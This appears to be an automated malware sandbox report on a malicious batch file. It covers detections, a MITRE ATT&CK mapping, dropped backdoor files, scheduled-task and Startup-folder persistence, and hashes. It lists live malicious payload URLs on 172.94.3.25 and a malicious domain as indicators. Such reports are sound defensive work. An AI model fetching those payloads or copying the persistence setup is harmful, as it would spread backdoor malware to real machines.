Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	2 Native API	112 Scripting	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	11 DLL Side-Loading	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	2 Obfuscated Files or Information	Security Account Manager	145 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 DLL Side-Loading	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	121 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Registry Run Keys / Startup Folder	131 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\vqqcre	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\mdvbfllr	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\yigmovm	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\vqqcre	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mdvbfllr	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\yigmovm	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	0%	ReversingLabs
C:\Users\user\DZIPR.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.symauth.com/cps0(	0%	URL Reputation	safe
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
http://172.94.3.25/AUGUST.exe	0%	Avira URL Cloud	safe
https://www.datanumen.com/zip-repair/	0%	Avira URL Cloud	safe
http://www.vmware.com/0	0%	Avira URL Cloud	safe
http://172.94.3.25/hi.vbs	0%	Avira URL Cloud	safe
http://172.94.3.25/ffo.bat	0%	Avira URL Cloud	safe
fullimmersion777.com	0%	Avira URL Cloud	safe
https://www.digicert.c	0%	Avira URL Cloud	safe
http://www.info-zip.org/	0%	Avira URL Cloud	safe
http://www.symauth.com/rpa00	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
http://www.vmware.com/0/	0%	Avira URL Cloud	safe
http://c0rl.m%L	0%	Avira URL Cloud	safe
http://www.repairfile.com	0%	Avira URL Cloud	safe
http://support.datanumen.com	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://172.94.3.25/hi.vbs	true	Avira URL Cloud: safe	unknown
http://172.94.3.25/AUGUST.exe	true	Avira URL Cloud: safe	unknown
http://172.94.3.25/ffo.bat	true	Avira URL Cloud: safe	unknown
fullimmersion777.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 00000013.00000003.2841725862.000001E28ADAE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.digicert.c	DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0	DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/zip-repair/	AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	DZIPR.exe, 0000000F.00000002.2745152463.0000000003511000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.000000000559F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D26000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.0000000005580000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004DE5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0/	DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c0rl.m%L	DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.repairfile.com	DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://support.datanumen.com	DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.94.3.25	unknown	United States		3223	VOXILITYGB	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518340
Start date and time:	2024-09-25 16:02:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	55Ka50lb6Z.bat renamed because original name is a hash value
Original Sample Name:	4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Detection:	MAL
Classification:	mal100.troj.expl.evad.winBAT@42/32@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 70 Number of non-executed functions: 230
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 55Ka50lb6Z.bat

Simulations

Behavior and APIs

Time	Type	Description
10:03:13	API Interceptor	88x Sleep call for process: powershell.exe modified
10:04:14	API Interceptor	2x Sleep call for process: svchost.exe modified
10:04:24	API Interceptor	5x Sleep call for process: cmd.exe modified
10:04:51	API Interceptor	1x Sleep call for process: explorer.exe modified
16:04:21	Task Scheduler	Run new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
16:04:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	zz91Dcv5Kf.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	V9HUU0LCin.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe	Get hash	malicious	Nanocore, Remcos	Browse	104.243.242.162
	zczsJahg5p.exe	Get hash	malicious	Nanocore, Remcos, PureLog Stealer	Browse	104.243.242.164
	SLL8zVmaGj.elf	Get hash	malicious	Unknown	Browse	185.247.61.190
	tfEceyjWwA.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.243.242.171
	UlKVk4jZsk.exe	Get hash	malicious	PureLog Stealer	Browse	104.243.242.162
	9buT5F16iZ.exe	Get hash	malicious	PureLog Stealer	Browse	104.243.242.166

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7516129642855441
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0X:9JZj5MiKNnNhoxub
MD5:	EDE026B2FF78D29BF20A2A1E6C295D57
SHA1:	9B31DF81FF979E8ED89DCE2F580AA5B0F959623E
SHA-256:	F2D0B9D6637D9892B4D5959ECC23F255688929159B53C255719F0C3E5F63CB83
SHA-512:	4BA15135903F3FA7DB72F16471A397219694181A589BB8E0CDFFD2DBD358100E8F0A226A337EE43EE6CB467EE6441173048A8C1EE4AF92F8B623F60E2ADA861B
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x012569d2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555892334743011
Encrypted:	false
SSDEEP:	1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
MD5:	BA908786CB88453C2528527D7C2B9049
SHA1:	46627465BC5139CE7D4B0558A0E97B707C638025
SHA-256:	14DCDC5731B3CE423B2A8F481FE1821221801C45B40F22084452E3B3042A0CD0
SHA-512:	C23F5139EFB3B1CCAACC11243E946240EA701A980153C91D6944594EC94062A545346CC77CA35984CEE03141BA2248F5420D4A046907FA02AF5E7FF31C3CFF59
Malicious:	false
Preview:	.%i.... .......7.......X\...;...{......................0.e......!...{?......\|a.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..........................................\|a..................W.......\|a..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07984105005364
Encrypted:	false
SSDEEP:	3:sE1yYeceJt3Kg3NaAPaU1lTKAtl/lAlluxmO+l/SNxOf:sjzHKANDPaUbZtAgmOH
MD5:	141861E603ACE88C12B388D03B7DFB18
SHA1:	4004E1FF17D9A0C5122A3ADDF74953159DBF11E1
SHA-256:	143C745DD786D130E64FD1A97975EE17A8E124490A17B5FFC840B2C2DBDEE8FC
SHA-512:	47E296E548D044C27AC1A2D25D4DCD842BA766359950372655B8E2A1CE0FB7333BD21858770CACFA7797F15493658DD4353CA031BA41D0F7CA72241B755279D6
Malicious:	false
Preview:	.........................................;...{.......\|a..!...{?..........!...{?..!...{?..g...!...{?..................W.......\|a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\428c6e6

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	1234044
Entropy (8bit):	7.662461501341374
Encrypted:	false
SSDEEP:	24576:29gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:29g0exADLuXQHot
MD5:	92D073FB1F41B4EB75090198FECFF04D
SHA1:	EC64425F18FCA2D451C1EC84979330E8126BA248
SHA-256:	48E92CC7972F576C149A5FB4BE70A6A14FF3F87D9ED54D1FE905CFCECE534D1C
SHA-512:	9E05704DDE4EA3D6BC93AD62AD1B0F7A8049AB12F8FCD8F723E470A97C75C8F202A63988ED5D58EF05F58694831476F627926EB083F2C5513EDD708E84D25BDB
Malicious:	false
Preview:	n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gl5lkjwh.ens.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwkfgeuh.bc0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2vsl3l5.e1s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmr0i1rg.obx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjs0e3py.sx3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm113ebu.0yg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\f56bc3f4

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	1234044
Entropy (8bit):	7.662460929035292
Encrypted:	false
SSDEEP:	24576:+9gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:+9g0exADLuXQHot
MD5:	94DBA9BBE1B5D782E3E25F4DF3AC607C
SHA1:	DC2B86C2C891938FAF58BA4C3E2911B829815820
SHA-256:	6435AA646B08E38425E6A12C3D046DB131B923C3C01D3489BDC8C96ADFA56588
SHA-512:	C2A254BCE51D284E3F64DA90B1EDAC0F82C999CBB90CE90B3D69C60E34DA5CFA5EF5A2E1F096FBBAAE9076A91B8610499D8FF1EC35A565674DF745265CE3F3B0
Malicious:	false
